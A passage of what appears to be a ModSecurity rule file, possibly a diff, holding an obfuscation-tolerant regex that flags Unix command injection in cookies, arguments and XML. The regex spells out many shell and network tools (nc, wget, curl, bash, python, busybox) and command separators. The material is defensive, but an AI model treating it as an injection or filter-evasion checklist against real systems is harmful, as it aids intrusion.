[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[arx])?|G[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?E[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?T|a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:b|(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?t|r(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[jp])?|s(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[ks])|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c
?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[89][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?9|[au][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|c|(?:m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?p|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[dfu]|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[gr])|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[bdx]|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|q[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|s(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)?)|f[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[cdgi]|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[chr][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|o|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)|h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[dp]|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b)|j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)
[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s|q)|k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d)?|[nps]|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a|z(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?4)?)|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r|v)|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[cl]|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?m)|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[at][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|f|(?:k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?g|h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[cp]|r(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r
|c(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)?|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dv]|(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?m)|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dt]|[ghu]|s(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)?|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[cr]|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l|[co][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[ex]|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c)|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|l)|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:3[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|c)|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|z)|y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)|z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[
!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i).\|(?:[\s\x0b]*|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!
#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[arx])?|G[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?E[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?T|a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:b|(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?t|r(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[jp])?|s(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[ks])|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*
)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[89][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?9|[au][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|c|(?:m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?p|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[dfu]|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[gr])|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[bdx]|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|q[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|s(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)?)|f[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[cdgi]|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[chr][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|o|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)|h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[dp]|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b)|j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?
(?:j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s|q)|k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d)?|[nps]|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a|z(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?4)?)|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r|v)|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[cl]|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?m)|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[at][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\